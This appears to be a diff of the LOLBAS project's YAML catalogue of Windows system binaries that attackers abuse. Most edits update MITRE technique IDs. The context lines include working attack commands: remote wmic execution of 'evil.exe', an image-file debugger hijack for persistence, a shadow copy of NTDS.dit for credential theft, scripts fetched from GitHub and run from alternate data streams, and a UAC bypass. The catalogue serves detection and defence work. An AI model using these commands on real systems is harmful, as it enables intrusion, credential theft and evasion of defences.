Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||||
Usecase: Execute code from alternate data stream
|
Usecase: Execute code from alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe -sta {CLSID}
|
- Command: rundll32.exe -sta {CLSID}
|
||||||
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
|
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
|
||||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID:
|
MitreID: T1218.011
|
||||||
MitreLink:
|
|
||||||
OperatingSystem: Windows 10 (and likely previous versions)
|
OperatingSystem: Windows 10 (and likely previous versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rundll32.exe
|
- Path: C:\Windows\System32\rundll32.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\runonce.exe
|
- Path: C:\Windows\System32\runonce.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Execute binary file hidden inside an alternate data stream
|
Usecase: Execute binary file hidden inside an alternate data stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\sc.exe
|
- Path: C:\Windows\System32\sc.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\schtasks.exe
|
- Path: c:\windows\system32\schtasks.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||||
Description: Executes calc.cmde from remote server
|
Description: Executes calc.cmde from remote server
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\scriptrunner.exe
|
- Path: C:\Windows\System32\scriptrunner.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
|
||||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
|
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
|
||||||
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
|
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
|
||||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\SettingSyncHost.exe
|
- Path: C:\Windows\System32\SettingSyncHost.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\stordiag.exe
|
- Path: c:\windows\system32\stordiag.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
|
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10 2004
|
OperatingSystem: Windows 10 2004
|
||||||
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
|
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
|
||||||
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10 1909
|
OperatingSystem: Windows 10 1909
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\ttdinject.exe
|
- Path: C:\Windows\System32\ttdinject.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10 1809 and newer
|
OperatingSystem: Windows 10 1809 and newer
|
||||||
- Command: TTTracer.exe -dumpFull -attach pid
|
- Command: TTTracer.exe -dumpFull -attach pid
|
||||||
Description: Dumps process using tttracer.exe. Requires administrator privileges
|
Description: Dumps process using tttracer.exe. Requires administrator privileges
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
|
||||||
OperatingSystem: Windows 10 1809 and newer
|
OperatingSystem: Windows 10 1809 and newer
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\tttracer.exe
|
- Path: C:\Windows\System32\tttracer.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
|
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
|
||||||
Description: Description of the second command
|
Description: Description of the second command
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\verclsid.exe
|
- Path: C:\Windows\System32\verclsid.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe process call create calc
|
- Command: wmic.exe process call create calc
|
||||||
Description: Execute calc from wmic
|
Description: Execute calc from wmic
|
||||||
@ -18,7 +17,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||||
@ -26,7 +24,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
||||||
Description: Execute evil.exe on the remote system.
|
Description: Execute evil.exe on the remote system.
|
||||||
@ -34,7 +31,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||||
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
|
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
|
||||||
@ -42,7 +38,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
||||||
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
||||||
@ -50,7 +45,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
||||||
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
||||||
@ -58,7 +52,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||||
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
|
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
|
||||||
@ -66,7 +59,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\wbem\wmic.exe
|
- Path: C:\Windows\System32\wbem\wmic.exe
|
||||||
|
@ -10,7 +10,6 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
|
||||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\WorkFolders.exe
|
- Path: C:\Windows\System32\WorkFolders.exe
|
||||||
|
@ -9,16 +9,14 @@ Commands:
|
|||||||
Usecase: Execute hidden code to evade defensive counter measures
|
Usecase: Execute hidden code to evade defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
|
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
|
||||||
Description: Download and execute script stored in an alternate data stream
|
Description: Download and execute script stored in an alternate data stream
|
||||||
Usecase: Execute hidden code to evade defensive counter measures
|
Usecase: Execute hidden code to evade defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1564.004
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\wscript.exe
|
- Path: C:\Windows\System32\wscript.exe
|
||||||
|
@ -9,8 +9,7 @@ Commands:
|
|||||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||||
Category: UAC bypass
|
Category: UAC bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1088
|
MitreID: T1548.002
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1088
|
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\wsreset.exe
|
- Path: C:\Windows\System32\wsreset.exe
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user